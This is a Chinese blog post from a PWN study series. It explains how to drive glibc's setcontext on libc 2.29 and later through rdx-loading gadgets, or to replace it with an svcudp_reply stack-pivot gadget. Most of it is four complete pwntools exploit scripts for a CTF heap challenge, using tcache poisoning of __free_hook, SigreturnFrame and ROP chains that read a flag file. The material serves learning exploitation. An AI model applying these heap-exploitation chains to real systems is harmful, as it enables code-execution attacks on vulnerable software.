【我的 PWN 学习手札】新版本libc下的setcontext与平替gadget

于 2024-10-31 08:55:29 发布
阅读量778 收藏 5
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 【我的 PWN 学习手札】 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/143378048

从 libc-2.29 版本起,setcontext 改用 rdx 寄存器来访问 SigreturnFrame 结构,因此无法直接利用 setcontext 的 gadget 将 free 的 SigreturnFrame 结构赋值给寄存器。

目录

一、利用gadget

(一)利用第一条gadget

(二)利用第二条gadget 

1、不需要泄露堆地址 

2、需要泄露堆地址 

二、平替setcontext

一、利用gadget

可以先泄露堆地址,然后通过下面两条 gadget 中的一条将释放的 chunk 的内存地址赋值给 rdx 然 后跳转到 setcontext 的 gadget 。

mov rdx, [rdi+0x8]; mov rax, [rdi]; mov rdi, rdx; jmp rax;

mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];

(一)利用第一条gadget

# 利用第一种gadget
from pwn import *
elf=ELF('./pwn_')
libc=ELF('./libc.so.6')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn_')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())



### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x3b6be0
success("libc base: "+hex(libc.address))
success("free hook: "+hex(libc.sym['__free_hook']))
### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)
edit(0,0x8,p64(libc.sym['__free_hook']))


add(1,0x3f8)
add(0,0x3f8)

# setcontext+gadget ROP
# mov rdx, [rdi+0x8]; mov rax, [rdi]; mov rdi, rdx; jmp rax;
gadget_addr=libc.search(asm('mov rdx, [rdi+0x8]; mov rax, [rdi]; mov rdi, rdx; jmp rax;'),executable=True).__next__()

flag_addr=libc.sym['__free_hook']+0x100
frame_addr=libc.sym['__free_hook']+0x120
buf_addr=libc.sym['__free_hook']+0x200

# read(3,buf,0x20)
ROP_chain=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(3)
ROP_chain+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.search(asm('pop rdx;ret'),executable=True).__next__())
ROP_chain+=p64(0x20)
ROP_chain+=p64(libc.sym['read'])
# puts(buf)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.sym['puts'])

payload=b''
payload+=p64(gadget_addr)
payload+=ROP_chain
payload=payload.ljust(0x100,b'\x00')
payload+=b'./flag\x00'
payload=payload.ljust(0x120,b'\x00')

frame=SigreturnFrame()
frame.rdi=flag_addr
frame.rip=libc.sym['open']
frame.rsp=libc.sym['__free_hook']+0x8
payload+=bytes(frame)

edit(0,len(payload),payload)
edit(1,0x10,p64(libc.sym['setcontext']+53)+p64(frame_addr))
success(hex(frame_addr))
gdb.attach(io,'b free\nc')
sleep(0.5)
delete(1)
io.interactive()

(二)利用第二条gadget 

1、不需要泄露堆地址 

# 利用第二种gadget,不需要leak堆地址
from pwn import *
elf=ELF('./pwn')
libc=ELF('/home/hacker/glibc-all-in-one/libs/2.31-0ubuntu9.16_amd64/libc-2.31.so')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())

gdb.attach(io)

### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x1ecbe0
success("libc base: "+hex(libc.address))

### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)

## 不需要泄露堆指针的方法
# show(0)
# heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
# success("heap base: "+hex(heap_base))

edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x3f8)
add(0,0x3f8)

### setcontext+gadget ROP
# mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];
gadget_addr=libc.search(asm('mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];'),executable=True).__next__()

payload_addr=libc.sym['__free_hook']
ROP_addr=payload_addr+0x8
flag_addr=payload_addr+0x100
frame_addr=payload_addr+0x120
buf_addr=payload_addr+0x200

ROP_chain=b''
# read(3,buf,0x20)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(3)
ROP_chain+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.search(asm('pop rdx ; pop rbx ; ret'),executable=True).__next__()) #所选libc没有直接的pop rdx;ret
ROP_chain+=p64(0x20)
ROP_chain+=p64(0)
ROP_chain+=p64(libc.sym['read'])
# puts(buf)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.sym['puts'])

payload=b''
payload+=p64(gadget_addr)
payload+=ROP_chain
payload=payload.ljust(0x100,b'\x00')
payload+=b'./flag\x00'
payload=payload.ljust(0x120,b'\x00')

frame=SigreturnFrame()
# open("./flag")
frame.rdi=flag_addr
frame.rip=libc.sym['open']
frame.rsp=payload_addr+0x8
frame=bytearray(frame.__bytes__())
frame[0x20:0x20+8]=p64(libc.sym['setcontext']+61)

payload+=bytes(frame)

edit(0,len(payload),payload)
edit(1,0x10,b'a'*8+p64(frame_addr))
# pause()
delete(1)
io.interactive()

2、需要泄露堆地址 

# 利用第二种gadget,但是需要leak堆地址
from pwn import *
elf=ELF('./pwn')
libc=ELF('/home/hacker/glibc-all-in-one/libs/2.31-0ubuntu9.16_amd64/libc-2.31.so')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())

gdb.attach(io)

### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x1ecbe0
success("libc base: "+hex(libc.address))

### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)
show(0)
heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
success("heap base: "+hex(heap_base))

edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x3f8)
add(0,0x3f8)

### setcontext+gadget ROP
# mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];
gadget_addr=libc.search(asm('mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];'),executable=True).__next__()
info(hex(gadget_addr))

payload=b''
payload+=p64(gadget_addr)
# read(3,add,0x20)
payload+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
payload+=p64(3)
payload+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
payload+=p64(libc.sym['__free_hook']+0x108)
payload+=p64(libc.search(asm('pop rdx ; pop rbx ; ret'),executable=True).__next__()) #所选libc没有直接的pop rdx;ret
payload+=p64(0x20)
payload+=p64(0)
payload+=p64(libc.sym['read'])
# puts(add)
payload+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
payload+=p64(libc.sym['__free_hook']+0x108)
payload+=p64(libc.sym['puts'])
payload=payload.ljust(0x100,b'\x00')
payload+=b'./flag\x00'

edit(0,len(payload),payload)

#open("./flag")
frame=SigreturnFrame()
frame.rdi=libc.sym['__free_hook']+0x100
frame.rip=libc.sym['open']
frame.rsp=libc.sym['__free_hook']+0x8

frame=bytearray(frame.__bytes__())
chunk_addr=heap_base+0x2a0
frame[0x8:0x10]=p64(chunk_addr)
frame[0x20:0x28]=p64(libc.sym['setcontext']+61)


edit(1,len(bytes(frame)),bytes(frame))
pause()
delete(1)
print(frame)
io.interactive()

二、平替setcontext

可以看到,setcontext gadget帮助我们完成了栈迁移和执行流的劫持。如果有其他gadget,也可以做到栈迁移和劫持执行流,那么也就可以平替setcontext

有这样一个gadget(在某些特定libc版本下存在):

0x7ffff7923f36 <svcudp_reply+22>     mov    rbp, qword ptr [rdi + 0x48]
0x7ffff7923f3a <svcudp_reply+26>     mov    rax, qword ptr [rbp + 0x18]
0x7ffff7923f3e <svcudp_reply+30>     lea    r12, [rbp + 0x10]
0x7ffff7923f42 <svcudp_reply+34>     mov    dword ptr [rbp + 0x10], 0
0x7ffff7923f49 <svcudp_reply+41>     mov    rdi, r12
0x7ffff7923f4c <svcudp_reply+44>     call   qword ptr [rax + 0x28]

可以设想,当我们释放一个堆块触发__free_hook时,堆块偏移0x48的位置写rbp,然后rbp偏移0x18的地方写rax,再rax偏移0x28的地方写"leave;ret"的地址,就可以实现栈迁移。 

图参考自看雪 

 

我是这么布局的 :

 

# 利用svcudp_reply gadget
from pwn import *
elf=ELF('./pwn_')
libc=ELF('./libc.so.6')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn_')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())

gdb.attach(io)

### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x3b6be0
success("libc base: "+hex(libc.address))

### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)

edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x3f8)
add(0,0x3f8)

'''
   0x7ffff7923f36 <svcudp_reply+22>     mov    rbp, qword ptr [rdi + 0x48]
   0x7ffff7923f3a <svcudp_reply+26>     mov    rax, qword ptr [rbp + 0x18]
   0x7ffff7923f3e <svcudp_reply+30>     lea    r12, [rbp + 0x10]
   0x7ffff7923f42 <svcudp_reply+34>     mov    dword ptr [rbp + 0x10], 0
   0x7ffff7923f49 <svcudp_reply+41>     mov    rdi, r12
   0x7ffff7923f4c <svcudp_reply+44>     call   qword ptr [rax + 0x28]
'''

rbp=libc.sym['__free_hook']
rax=libc.sym['__free_hook']+0x100
flag_addr=libc.sym['__free_hook']+0x150
buf_addr=libc.sym['__free_hook']+0x200


payload=p64(libc.sym['svcudp_reply']+22)
# 0x0000000000022aa0 : pop rsi ; pop r15 ; ret
payload+=p64(libc.search(asm('pop rsi ; pop r15 ; ret'),executable=True).__next__())
payload=payload.ljust(0x18,b'\x00')
payload+=p64(rax)

ROP_chain=b''
# open('./flag')
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(flag_addr)
ROP_chain+=p64(libc.sym['open'])
# read(3,buf,0x20)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(3)
ROP_chain+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.search(asm('pop rdx;ret'),executable=True).__next__())
ROP_chain+=p64(0x20)
ROP_chain+=p64(libc.sym['read'])
# puts(buf)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.sym['puts'])

payload+=ROP_chain
payload=payload.ljust(0x100+0x28,b'\x00')
payload+=p64(libc.search(asm("leave;ret"),executable=True).__next__())
payload=payload.ljust(0x150,b'\x00')
payload+=b'./flag\x00'
payload=payload.ljust(0x200,b'\x00')



edit(0,len(payload),payload)
edit(1,0x50,b'a'*0x48+p64(rbp))
pause()
delete(1)
io.interactive()
pwn中的万能gadget函数
Assassin
04-08 798
pwn的过程中,有一些一般程序都有的万能gadget函数,特别时程序在初始化的时候一般会有下面函数,就为构造ROP链提供了原材料 _init _start call_gmon_start deregister_tm_clones register_tm_clones __do_global_dtors_aux frame_dummy __libc_csu_init __libc_csu_fini _fini _dl_runtime_resolve __libc_csu_init .text:000000
pwn学习-ret2libc1
Sa1nZen的博客
06-02 378
pwn学习-ret2libc1
【我的 PWN 学习手札】House of Karui —— tcache key 绕过
Mr_Fmnwon的博客
09-21 787
早期版本的 tcachebin 由于毫无保护,导致攻击利用非常容易,成为重灾区。tcache dup,也即 tcachebin 中的 double free 利用手法,是攻击者常常选用的攻击方式。然而,在glibc-2.29开始,添加了对 tcache key,对 double free 进行了检查。本篇介绍的 House of Karui 即是一种非常简单的通过溢出来实现绕过,造成double free的方法。
PWN GADGET 入门
baidu_39617633的博客
09-25 1045
PWN GADGET 入门 checksec ret2syscall 拖入相应的IDA 3. playload构造 漏洞点 gets() 无canary,开启栈保护(NX ENABLE),无法直接将shellcode写入栈,需要gadget 计算padding IDA反编译直接查看 距离ebp为0x64,根据返回地址在ebp下一个字长处,所以总padding为0x64+0x4 但是失败。IDA有坑! GDB查看栈 填充0x86个a 使用gdb.attach()下断点至g
xnuca2018-pwn-0gadget
sunrise的博客
11-24 844
off-by-one double free,uaf fast-bin-attack 函数功能: add函数中有一个off-by-one溢出,可以修改下一个本数组的堆指针的最后一个字节,使其指向最后一字节为'\x00'的堆块 用off-by-one修改后,free这个unsortedbin堆块,然后显示其中的fd,得到libc基址 同理,用do...
PWN入门之通用gadgets
weixin_44681716的博客
04-09 3140
实验目的 针对一些程序运行时的初始化函数(如加载libc.so的初始化函数),提取一些通用的gadgets,从而更利于我们继续ROP操作。 实验文件 这次实验的可执行文件文件通过我们自己编译一个程序产生,为了降低实验的难度,我们在进行编译的时候,关闭栈保护和数据执行保护(DEP)。 ...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
pwn学习-ret2libc3
Sa1nZen的博客
06-30 672
pwn学习-ret2libc3
pwn学习-ret2libc2
Sa1nZen的博客
06-16 280
pwn学习-ret2libc2
[CTF]-PWN:C++文件更换libc方法(WSL)
2301_79326813的博客
02-16 2818
C++文件C文件更换libc有很多不一样的地方,我是在写buu的ciscn_2019_final_3才意识到这个问题,C文件只需要更换libc和ld就可以了,但是C++文件不同,除了更换libc和ld,它还需要更换libstdc++.so.6和libgcc_s.so.1更换libc和ld的方法我在里讲了,这里就不重复讲了。主要是把更换libstdc++和libgcc的方法讲一下。如果是用虚拟机的话也可以根据wsl的方法改一下路径,也是可以按照这个方法改的。
pwn练习1-ret2syscall(ROP-gadget
m0_51756263的博客
10-07 1785
pwn练习1-ret2syscall(ROP-gadget
PWn基本工具安装
weixin_61804402的博客
05-27 388
main_arena_offset——一个简单的 shell 脚本,用于获取给定 libc 的偏移量。one_gadget ——一键找到 shell 地址。ROPgadget——ROP命令找到的gadget。checksec ——检测文件保护机制。LibcSearcher——代替。在github上克隆pwndbg。IDA Pro——静态代码分析。pwndbg——动态调试。
Pwn
bluestar628的博客
07-11 2567
Pwn1拿到程序IDA分析发现就是一个输入字符串,长度大于0x500就直接执行cat flag。虽然溢出了,但是和溢出没有太大关系所以利用代码如下:from pwn import * p = remote ("139.224.220.67" ,30004) payload = 'a'*0x501 p.sendline(payload) p.interactive()Pwn2打开IDA分析,是一个经...
使用 setcontext 类函数实现 mini 协程库
Tattoo的博客
12-20 1965
协程实现原理 协程的本质都是通过修改 ESP 和 EIP 指针来实现的。其理论上还是单线程在运行. 程序在CPU上运行时依赖3个寄存器: ESP寄存值指向当前栈顶地址,指向当前指令需要的数据 EBP指向当前活动栈帧的基地址 指令寄存器IP,指向当前需要运行的指令 实现协程的多种方法 利用 glibc 的 ucontext 组件(云风的库) 使用汇编来切换上下文(实现miniC协程,腾讯lib...
Unix/Linux编程:getcontext、setcontext
OceanStar的博客
07-13 3987
ucontext该结构提供了所谓的用户上下文信息,用于描述调用信号处理器函数前的进程状态,其中包括上一个进程信号掩码以及寄存器的保存值,例如程序计数器(cp)和栈指针寄存器(sp),使用结构 ucontext_t 的其他函数有 getcontext()、makecontext()、setcontext()和 swapcontext(),分别对应的功能是允许进程去接收、创建、改变以及交换执行上下文。(这些操作有点类似于 setjmp()和 longjmp(),但更为通用。)可以使用这些函数来实现协程(cor.
协程分析之 context 上下文切换
INGNIGHT的专栏
09-08 1103
转载:https://juejin.im/entry/6844903448849154061 协程现在已经不是个新东西了,很多语言都提供了原生支持,也有很多开源的库也提供了协程支持。 最近为了要给tbox增加协程,特地研究了下各大开源协程库的实现,例如:libtask, libmill, boost, libco, libgo等等。 他们都属于stackfull协程,每个协程有完整的私有堆栈,里面的核心就是上下文切换(context),而stackless的协程,比较出名的有protothreads,
【我的 PWN 学习手札setcontext + ROP
Mr_Fmnwon的博客
10-28 1295
setcontextgadget能够“恢复上下文”,即设置寄存器的值。除了可以利用其执行shellcode,还可以实现ROP来getshell。本篇介绍了利用setcontext+ROP的方法,ORW地打印flag信息。
强网杯2021 pwn 赛题解析——babypwn
CoLin的pwn小屋
07-26 1044
强网杯2021 pwn 赛题回顾——babypwn
【我的 PWN 学习手札setcontext + shellcode
Mr_Fmnwon的博客
10-24 934
之后释放一个 SigreturnFrame,寄存器设置如下图所示。程序通过 setcontext gadget 设置寄存器后将 完成栈迁移可程序执行流劫持后程序将执行,此时会调用 mprotect 函数将 free_hook 所在内存页添加 可执行属性并且会将栈迁移至 &free_hook+0x8 的位置。执行完 mprotect 函数后程序将跳转至 shellcode1 执行。shellcode 会向 __free_hook 所在内存页起始位置读入能 orw 的 shellcode2 并跳转 至 shel
pwn libc版本
最新发布
03-14
### PWNLibc 版本差异及其使用场景 在渗透测试和CTF竞赛中,`libc` 的版本差异是一个非常重要的因素。不同的 `libc` 版本可能导致相同的漏洞利用脚本无法跨台运行[^2]。 #### 1. **Libc 版本差异的影响** - 不同操作系统或发行版可能预装了不同版本的 `glibc` 库。这些库中的函数地址、堆管理器实现以及系统调用接口可能存在显著区别。 - 在某些情况下,即使两个系统都基于同一 Linux 发行版,但由于更新策略的不同,也可能安装了不兼容的 `libc` 版本[^3]。 #### 2. **常见 Libc 差异分析** - **堆分配机制**: 各种 `malloc` 实现(如 ptmalloc2 和 tcache)会因版本而异。较新的 `libc` 可能引入额外的安全特性,例如 tcache poisoning 防护[^4]。 - **符号偏移量变化**: 函数指针表的位置可能会随着新功能加入或者修复已知问题发生调整。这直接影响ROP链构建过程[^1]。 - **ASLR 支持强度**: 较新版通常具备更强随机化能力,增加了攻击难度;然而通过特定技术仍可绕过部分防护措施。 #### 3. **PWN 利用时如何处理 Libc 版本差异** 为了应对上述挑战,在实际操作过程中可以采取如下方法: ##### 使用工具辅助定位具体版本号 - 推荐采用专门开发用于此目的的应用程序比如 `one_gadget`, 它可以根据给定的目标二进制文件自动计算出所有可用的一键触发 shellcode 地址集合。 ##### 动态加载远程服务器上的真实共享对象副本 当本地缺乏匹配项时,则需下载对应架构下的官方包并提取其中的内容作为参考依据。 ```bash wget http://ftp.debian.org/debian/pool/main/g/glibc/libc6_*.deb ar xv data.tar.xz ./lib/x86_64-linux-gnu/ cp lib/x86_64-linux-gnu/* /your/local/path/ ``` ##### 自定义编写通用型Exploit框架 考虑到未来维护成本较低且适应范围广的优势所在,建议开发者自行搭建一套模块化的解决方案体系结构来满足多样化的需求情境。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值